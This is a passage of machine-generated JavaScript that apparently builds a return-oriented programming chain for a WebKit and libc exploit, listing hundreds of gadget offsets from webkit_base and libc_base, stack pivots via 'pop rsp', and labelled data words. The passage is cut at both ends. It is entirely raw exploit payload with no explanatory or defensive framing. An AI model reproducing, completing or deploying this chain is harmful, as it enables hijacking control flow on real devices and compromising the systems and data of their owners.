set_gadget(libc_base+759608,); //pop rax
//L6547:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+328216, //L6551
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+328184, //L6549
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+328200, //L6550
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6548:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6549:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6550:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6551:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+328272, //L6553
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6553:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+328400, //L6555
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+328416, //L6556
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+328384, //L6554
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6554:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6555:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6556:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+328576, //L6560
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+328544, //L6558
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+328560, //L6559
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6557:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6558:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6559:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6560:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+328632, //L6562
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6562:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+328760, //L6564
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+328776, //L6565
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+328744, //L6563
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6563:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6564:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6565:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+328856, //L6566
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+328872, //L6567
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6566:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6567:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+328960, //L6568
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+328976, //L6570
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6568:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6570:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6571:
db([4294967268, 4294967295]); // -0x1c
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L6573:
db([4294967268, 4294967295]); // -0x1c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+329136, //L6576
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+329120, //L6574
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6574:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6576:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+329312, //L6579
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+329328, //L6580
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+329280, //L6577
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+329296, //L6578
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6577:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6578:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6579:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6580:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+329408, //L6581
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+329424, //L6582
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6581:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6582:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+329520, //L6584
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+329504, //L6583
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6583:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6584:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+329600, //L6585
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6585:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6586:
db([48, 0]); // 0x30
set_gadget(libc_base+144605,); //pop rdi
//L6587:
db([48, 0]); // 0x30
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+329744, //L6588
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+329776, //L6590
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+329760, //L6589
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6588:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6589:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6590:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+329944, //L6592
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+329960, //L6593
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+329928, //L6591
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6591:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6592:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6593:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+330072, //L6595
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+330120, //L6598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+330088, //L6596
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6595:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6596:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6597:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6598:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+330232, //L6599+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+330224, //L6599
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L6599:
db([0, 0]); // 0x0
set_gadgets([
ropchain+330248, //L6599+24
ropchain+330264, //L6594
libc_base+782311, //pop rsp
ropchain+335432, //L6600
//L6594:
libc_base+764760, //pop rsi
ropchain+330304, //L6601
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6601:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6603:
db([4294967268, 4294967295]); // -0x1c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+330424, //L6606
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+330408, //L6604
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6604:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6606:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+330600, //L6609
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+330616, //L6610
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+330568, //L6607
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+330584, //L6608
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6607:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6608:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6609:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6610:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+330696, //L6611
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+330712, //L6612
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6611:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6612:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+330808, //L6614
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+330792, //L6613
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6613:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6614:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+330888, //L6615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6615:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6616:
db([45, 0]); // 0x2d
set_gadget(libc_base+144605,); //pop rdi
//L6617:
db([45, 0]); // 0x2d
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+331032, //L6618
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+331064, //L6620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+331048, //L6619
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6618:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6619:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6620:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+331232, //L6622
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+331248, //L6623
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+331216, //L6621
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6621:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6622:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6623:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+331360, //L6625
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+331408, //L6628
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+331376, //L6626
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6625:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6626:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6627:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6628:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+331520, //L6629+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+331512, //L6629
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L6629:
db([0, 0]); // 0x0
set_gadgets([
ropchain+331536, //L6629+24
ropchain+331552, //L6624
libc_base+782311, //pop rsp
ropchain+337144, //L6630
//L6624:
libc_base+764760, //pop rsi
ropchain+331592, //L6631
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6631:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6633:
db([4294967268, 4294967295]); // -0x1c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+331712, //L6636
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+331696, //L6634
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6634:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6636:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+331888, //L6639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+331904, //L6640
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+331856, //L6637
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+331872, //L6638
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6637:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6638:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6639:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6640:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+331984, //L6641
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+332000, //L6642
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6641:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6642:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+332096, //L6644
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+332080, //L6643
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6643:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6644:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+332176, //L6645
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6645:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6646:
db([43, 0]); // 0x2b
set_gadget(libc_base+144605,); //pop rdi
//L6647:
db([43, 0]); // 0x2b
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+332320, //L6648
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+332352, //L6650
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+332336, //L6649
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6648:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6649:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6650:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+332520, //L6652
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+332536, //L6653
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+332504, //L6651
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6651:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6652:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6653:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+332648, //L6655
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+332696, //L6658
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+332664, //L6656
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6655:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6656:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6657:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6658:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+332808, //L6659+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+332800, //L6659
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L6659:
db([0, 0]); // 0x0
set_gadgets([
ropchain+332824, //L6659+24
ropchain+332840, //L6654
libc_base+782311, //pop rsp
ropchain+338856, //L6660
//L6654:
libc_base+764760, //pop rsi
ropchain+332880, //L6661
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6661:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6663:
db([4294967268, 4294967295]); // -0x1c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+333000, //L6666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+332984, //L6664
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6664:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6666:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+333176, //L6669
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+333192, //L6670
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+333144, //L6667
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+333160, //L6668
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6667:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6668:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6669:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6670:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+333272, //L6671
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+333288, //L6672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6671:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6672:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+333384, //L6674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+333368, //L6673
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6673:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6674:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+333464, //L6675
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6675:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6676:
db([32, 0]); // 0x20
set_gadget(libc_base+144605,); //pop rdi
//L6677:
db([32, 0]); // 0x20
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+333608, //L6678
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+333640, //L6680
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+333624, //L6679
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6678:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6679:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6680:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+333808, //L6682
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+333824, //L6683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+333792, //L6681
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6681:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6682:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6683:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+333936, //L6685
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+333984, //L6688
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+333952, //L6686
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6685:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6686:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6687:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6688:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+334096, //L6689+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
